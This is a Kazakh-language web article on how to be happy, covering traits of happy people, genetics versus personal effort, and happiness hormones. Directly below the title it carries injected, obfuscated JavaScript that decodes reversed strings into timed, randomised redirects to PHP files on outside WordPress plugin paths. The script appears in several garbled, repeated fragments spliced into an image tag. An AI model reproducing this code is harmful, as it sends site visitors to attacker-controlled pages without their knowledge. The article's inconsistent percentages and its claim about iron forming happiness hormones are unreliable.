БАҚЫТТЫ БОЛҒЫҢЫЗ КЕЛЕ МЕ?

67212556_0006teyt$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/67212556_0006teyt.jpg» width=»48″ height=»69″ />

Бақытты болғыңыз келе ме? Мұндай сұрақ қою біреулер үшін оның үстіне дәл қазіргідей уақытта ерсілеу де көрінуі мүмкін. Бірақ қай-қайсымыз, қандай кезеңде болмасын ешкімге жария етпестен бақытты болуды аңсайтынымыз ақиқат. Сіз бақытты болу оңай емес, ол кез-келгенге қона бермейді дейтін шығарсыз.Олай емес, дәл осы жерден қателік жібердіңіз. Себебі бізді Жаратушы  қиналып, амалсыздан өмір сүру үшін емес, бақытты өмір сүру үшін жаратқан. Есіңізден шығармаңыз.

  Сонымен бақыттың құны қандай? Сан түрлі жауап қатуға болады. Кейбіреулер бақытты болу үшін қолындағы бар байлығын беруге әзір.Ал, кейбіреулер қолында көк тиын болмаса да бақытты сәттерді бас айналдырып бір сәттік қана рахат сыйлайтын фармакологиялық  кейде, тіпт» есіріткі заттардан іздейді. Бірақ бұл таңдаудың жолы қысқа. Ал, адамдардың қалған бөлігі, әрине олардың саны аз емес, өтіп жатқан өмірінен бақыт, қуаныш дегеннің не екенін сезінбей-ақ- іштей мүжіліп күнін өткізе береді. Бірақ  мұны өзгерту өз қолыңызда екенін сіз де білесіз, біз бүгін соны есіңізде қайта салғанды дұрыс көрдік. Сонымен бақытқа салыстырмалы түрде қандай аса қымбат емес жолдармен, басқаша айтсақ өз күшімізді пайдалана әрі соған сене отырып жеткізуге болады. Осы сұрақты жіліктеуден бастайық.
 Бірінші бақытты адамды қалай байқауға болады және олар өзін ортада қалай ұстайды? Психологтар ұсынған статистикалық мәліметтерге сүйеніп айтар болсақ обьективті көрсеткіштер бойынша бақыттылардың санатына кірген адамдардың бойынан мынадай қасиеттер байқалған.
1. Мұндай адамдар өмірді және өзін сүйеді. Олардың өзін бағалауы жоғары, тіпті өте жоғары деп айтуға болады. Олар өздерін өзгелермен салыстырғанда епті әрі кез-келген жағдайға бейімделе кететін, жолы болғыш жандар санайды. Олар өздерін орташаға жататын қалың бұқарадан биіктеу ұстайды, себебі өздерін мұнан да  биік «мінберге» лайық көреді.
2. Қалыптасып қалған ішкі ақуалда  олардың іс- әрекеттері мүмкіндігінше еркін болады және өзінің әрекеттерін өз күшімен, өзіндік әсермен өздері үшін қажет бағытқа қарай бейімдей алады. Бұл дегеніңіз бұл адамдар заңдылықтарды жақсы білетін және соған мойынсұнатын, қысым байқалатын жерде ұзақ тұрақтай алмайтын, денсаулығы жақсы адамдар.
3. Мұндай адамдар қай кезде болмасын көңіл-күйі көтеріңкі жүреді. Олар табиғатынан болашағына сенетін оптемист адамдар.
4. Және олар көп жағдайда өзімшіл емес, көпшіл.
Бақытты адамдардың ерекшеліктері байқап отырғанымыздай салмақты, бойымызда мұндай қасиеттер бар деп есептейік, соны қалай пайдалануға болады, шындығында күрделі мәселе.
Бағзы замандардан-ақ бақытты адамдардың ксілік келбеті бір жағынан  сананы зерттеудің құралы болса, екінші жағынан адамдардың қызғаныш сезімін тудырған. « Ішерге асы, тігерге тұяғы жоқ, езуінен күлкі кетпейді, көңілді жүреді індет те алмайды. Ал, мен баймын, алтын десе алтын бар, кигенім жібектен, күміс ыдыстан ас ішемін, көңіл-күйім көтерілмей-ақ қойды…» баяғының байларының сөзі бұл. Ертегілердің кейіпкерлерін еске алып көріңізші, осылай сөйлейді.Ертегі аңыз да шындық бар. Одан бері талай-талай жыл өтті, қоғам да өзгерді, құндылықтарда өзгерді. Адамдар бұрынғыға қарағанда бақуатты, сауатты, бірақ жоғарыда келтірген пікірді бүгін де естуге болады. Неге?
 Заманауи ғылым  адамның пессемист болмаса оптемист болуының себебі генетикасына яғни тегіне байланысты екенін дәлелдеп отыр.Пайызға шағып айтсақ 50 пайызы тегіне, 10 пайызы ішкі әсерлерге 50 пайызы адамның өз күш-жігеріне байланысты екен.
  Адам-тегім сондай болған екен деп бар ауыртпалықты өткенге аударып қойып, қол қусырып отырудың еш жөні жоқ  өмірімізді өзгертуде өзімізде 40 пайыз мүмкіндік бар екен. Бұл аз күш емес. Бақытты өмірдің 40 пайызы өз қолымызда! Егер ерік-жігеріміз күшті болса оған ешқандай күш  кері әсерн тигізе алмайды.
 Бақытты болу үшін ең алдымен мақсатымызды айқындап алуымыз керек. Әрине  өмірдің өзі буырқанған теңіз. Сондықтан да үлкені бар кішісі бар мақсат көп. Бірақ соның ішіндегі ең маңыздысы бақытты болу. Дені дұрыс адам  алдымен айналасындағы адамдармен  жағымды қарым-қатынас орнатуға ұмтылады мұнсыз болмайды және ол өзі сүйетін кәсіппен айналысуы керек. Неге өзі сүйетін деп отырмыз. Өйткені адамның күнделікті істейтін жұмысы,кәсібі күнкөрісті ғана шешпеуі керек, , Атқарып жүрген жұмысында әр адам ойларын, сезімдерін еркін жеткізетіндей өзін еркін,сенімді ұстай алатындай болуы керек. Егер сіз айналаңыздағылармен жағымды қарым-қатынаста болсаңыз, өзіңіздің жан-тәніңіз қалаған  кәсіппен айналысып жүрсеңіз 40 пайыз бақыттысыз. Бұл жаман көрсеткіш емес. Неге? Себебі дәл қазіргі уақытта біздің көптеген замандастарымыздың басында бұл жағдайда жоқ. Келісесіз деп ойлаймын.
 Қалған 50,10 пайыз ше? Заңды сұрақ.. Сіздің сыртынан қарап мүмкіндігі шектеулі жандарды бақытсыз санауыңыз мүмкін. Жаңылысасыз. Крісінше, мұндай адамдар  он екі мүшесі сау, төрт құбыласы тең адамдарға қарағанда тезірек зерттеп түйсіне алады. Маңдайыңа баста құл, күң болу жазылғанмен  жаратқан сені еркіндік алудан шектеген жоқ. Тіпті мол байлық сыйлауы да мүмкін. (Монте-Кристоны еске алыңыз). Ендеше өз бақытың, өз тағдырың өз қолыңда деген сөздер  тегіннен –тегін айтылмаған.
  Бақыт дегенді көбіне жан-дүниенің қанағатымен өлшеп жатады. Жан-дүние  өзіңнен тыс әлеммен емес өз санаңмен, миыңмен байланысты. Адамзат мидың кейбір қызметтерін жаттықтыру әдістерін өте еретеден-ақ ойлап тауып, сәтті кәдеге асыра бастаған. Бұл жайлы арнайы әдебиеттерден оқуға болады, бірақ жаттығуды міндетті түрде маманмен жүргізу керек.
 Адам ағзасынан бақыт гармондарының бөлінеті ғылыми дәлелденген құбылыс. Бұл заттың құрылымы туабітті ерекшеліктермен тікелей байланысты. Бақыт гормондары ағзада біздің геніміздегі ақпараттар негізінде түзіледі. (Генмен берілетін 50 пайызыңыз осы)
  Үмітіңізді үзе көрмеңіз-гомондарды ынталандыруға яғни ағза жасушаларындағы темірдің түзілу процесін басқаруда біздің түпсанамыздың үлесі көп.(40 пайыз) Зерттеулер бақытты сезінуді сыртқы көмексіз-ақ өзіміздің «тәрбиелей» алатынымызды көрсетіп отыр Әрине қажет болған жағдайда маманның көмегі артық емес, бірақ ми қызметінің бақыт гормондарын түзетін ағзада темір түзілуін ынталандыру процесіне басшылық жасауды Жаратқан туғаннан –ақ маңдайымызға жазып қойған. Сондықтан да бақытты сезіну үшін ешқандай химиялық ынталандырғыштардың қажеті жоқ, бар болғаны бақытқа жеткізетін мақсатты әрекеттер мен обьективті ақпарат қажет.
 Балаларға қараңызшы., олар өмірінің әрбір сәтінде шынайы қуана, шынайы күле алады. Бақытты. Ол үшін ешқандай әрекет жасамайды. Қалай бар солай қабылдайды. Және оны кеңпейілмен ортасына ұсынады. Оның бақытты кейпіне қарап тұрып сізде еріксіз жымиясыз. Солай емес пе? Байқаған боларсыз бақыт деген өмірлік мақсат емес, ол сезіну, сезім. Ғылым бақытқа ұмтылу  мақсатқа айналғанда ,адамның оны сезінуден құр алақан қалатынын дәлелдеді.
  Ендеше бақыт пен мақсатты біріктіріп алып жүрмеңіз!{jcomments on}

Leave a Reply

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Яндекс.Метрика